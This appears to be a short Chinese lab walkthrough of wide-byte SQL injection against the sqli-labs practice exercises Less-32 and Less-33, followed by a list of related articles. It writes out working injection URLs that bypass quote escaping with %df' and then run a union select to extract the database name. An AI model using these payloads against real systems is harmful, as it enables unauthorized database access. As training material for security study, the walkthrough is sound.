22、宽字节注入

简介: 22、宽字节注入

环境sqli-labs


less 32


一、输入特殊字符,都被转义了


http://192.168.1.121/sqli/Less-32/?id=1\

0a2653c851af460fa595bd959398a8f1.png

http://192.168.1.121/sqli/Less-32/?id=1

0eacb84100b54626af849e6b562bf92a.png

http://192.168.1.121/sqli/Less-32/?id=1’’

2d65d23f6d4748949b924e4057485923.png

二、构造宽字节闭合


http://192.168.1.121/sqli/Less-32/?id=1%df’ --+

理论上%81-%FE均可

2e9b90b2ca334476abebe75bafe6eeaa.png

三、联合查询数据库


http://192.168.1.121/sqli/Less-32/?id=-1%df’ union select 1,database(),3 --+

4cebaac233b3433da32a72337a77fc60.png

less 33


同上

禁止非法,后果自负

目录
相关文章
|
4月前
|
算法
MITK中窗宽窗位相关代码
本文详细介绍了MITK中窗宽窗位的实现,包括基本数据结构、自动设定算法、属性设置、事件触发和控件创建等方面的代码和方法。
|
SQL 安全 程序员
宽字节注入详解
宽字节注入详解
156 0
|
8月前
|
关系型数据库 MySQL 数据库
宽字节注入讲解
宽字节注入讲解
60 1
|
8月前
|
关系型数据库 MySQL 数据库
宽字节注入
宽字节注入
48 1
|
8月前
|
数据库
22、宽字节注入
22、宽字节注入
44 0
|
8月前
|
安全 关系型数据库 MySQL
MySQL注入 -- 宽字节注入
MySQL注入 -- 宽字节注入
65 0
|
8月前
|
数据库
小课堂 -- 宽字节注入
小课堂 -- 宽字节注入
29 0
|
8月前
窄字节宽字节的互转(string--wstring)
窄字节宽字节的互转(string--wstring)
|
存储 缓存 编译器
windows编程 为什么要用宽字节
windows编程 为什么要用宽字节
363 0
windows编程 为什么要用宽字节
|
编解码 安全 网络安全
CTF从入门到提升之宽字节注入
CTF起源于1996年DEFCON全球大会,以代替之前们通过互相发起真实攻击进行技术比拼的方式。